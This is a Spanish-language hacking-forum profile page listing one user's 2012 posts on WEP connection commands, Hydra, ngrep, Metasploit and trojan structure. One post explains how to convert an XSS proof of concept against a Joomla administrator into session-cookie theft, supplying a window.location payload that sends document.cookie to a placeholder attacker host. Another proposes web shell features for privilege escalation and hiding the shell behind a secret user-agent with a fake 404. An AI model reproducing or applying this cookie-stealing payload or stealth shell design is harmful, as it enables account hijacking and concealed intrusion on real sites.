Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ameise_1987

#121
Cita de: R4z3L.hax en  4 Noviembre 2012, 23:08 PM
Pedia un codigo fuente de un troyano en python

http://lmgtfy.com/?q=troyano+en+python#

llegaras muy lejos asi ;)
#122
GNU/Linux / Re: backtrack 5 r1 bad password failed
4 Noviembre 2012, 19:57 PM
te recomiendo que no utilizes esos gestores, yo siempre los desactivo.

usando iwconfig.

1) tipea iwconfig en una consola y reviza que detecte la tarjeta, si tienes mas de 1 elige con cual te conectas.
2) hazte root.

*esto lo hago con el fin que no este el demonio de wicd intentando conectarse a otra red mientras yo lo hago por consola, aunque igual si existe un demonio intentando conectarse hay que matarlo
3) descativamos la interfaz =>  ifconfig wlan0 down
4) activamos la interfaz       => ifconfig wlan0 up

5)buscamos la red a la que intentaremos conectarnos => iwlist scanning | grep -i essid
6)nos conectamos  =>iwconfig wlan0 essid NombreRed key s:miclave
7)verificamos que estemos asociados a la red con un iwconfig
8)solicitamos los datos de conexion al servidor dhcp => dhclient wlan0


eso es todo para conectarse a wep, al principio te parecera todo un rollo pero despues te acostumbras y veras que es mejor que utilizar gestores.

y si quieres conectarte a wpa ya es otro tema y es mas facil utilizando wpa_passphrase y wpa_supplicant .

espero te sirva, saludos!!
#123
Bugs y Exploits / Re: Metasploit + Uso
4 Noviembre 2012, 19:17 PM
ns2.elhacker.net/TallerMetasploit2012.pdf

justo lo que necesitabas, en la portada del foro
#124
Hacking / Re: hydra http-post-form
4 Noviembre 2012, 19:02 PM
no es magia amigo, tienes que poner el texto que corresponde a cuando la contraseña es invalida o cuando la contraseña es valida, al fin y al cabo esto funciona como VERDADER o FALSO.
si no hay cambios en la web cuando introduces un password erroneo, reviza el status devuelto por el servidor.

saludos.
#125
si es por estudiar la estructura, la estructura es la misma para todos, cliente como servidor y servidor como cliente(conexion inversa), se envia un string que determina el payload a ejecutar, se ejecuta y envia el resultado.

ahora, cual es la idea de realizar un troyano en python ??.    :-\
#126
Hacking / Re: wireshark "bytes in flight"
25 Octubre 2012, 19:57 PM
quizas no resuelve tu duda pero te recomiendo para tareas pequeñas, como analizar el trafico de una apliacion ngrep , pequeño analizador pero muy util y es mi preferido.

para una captura local :
ngrep -d lo -W byline host 127.0.0.1 and port 80

ahora si lo que estas haciendo es capturando el trafico que genera tu navegador web, te recomiendo HTTP LIVE HEADERS para capturar las peticiones.


saludos.
#127
el que dices que deberias usar, es un xss que se envia a travez del metodo post ya que es un formulario, ahi te indica que es un poc y cuando el administrador lo ejecute le saldra una ventana con un mensaje, ahora ese mensaje si lo quieres utilizar lo debes cambiar para realizar el robo de la cookie de la sesion del administrador.

esta parte debes cambiar :
alert(document.cookie)

por algo como
window.location='http://tuhostquealmacenaralacookie.com.ar/robo_cookie.php'+document.cookie

con esto el administrador estaria enviando la cookie a tu host y esta seria captada por el PHP, ahora te digo que este seria el ataque mas basico y el mas cantoso asi que a ingeniarselas.

tambien debes cambiar la ruta de la web del administrador "http://joomla/administrator/index.php".
#128
podrias agregar funciones que no tienen otras shell, como por ejemplo:

1)conexion a servidor LDAP ??(entre mas versiones mejor, no olvideis active directory y menos openldap please  :rolleyes: ), sirve bastante, creemelo y estaria agradecido ya que ninguna shell lo tiene, por lo menos las que he visto.
2)expresion regular que automatize la busqueda de ejecutables con el SUID activo, facilitaria la busqueda para intentar una escalada de privilegios.
3)listado de procesos y versiones de procesos corriendo como root, y un enlace a su respectivo exploit.

ahi te dejo algunas opciones que podeis agregar, yo he pensado en programar mi shell pero por tiempo no he podido, quizas en un futuro no muy lejano lo pueda hacer :B .

saludines !!

PD: tambien seria interesante para ocultar la shell de algunos mirones, que esta solo respodiera a X user-agent, osea que para poder acceder a esta tenga que modificar el user-agent poniendo un hash como clave, si coincide se muestra la shell de lo contrario mostraria un error 404 .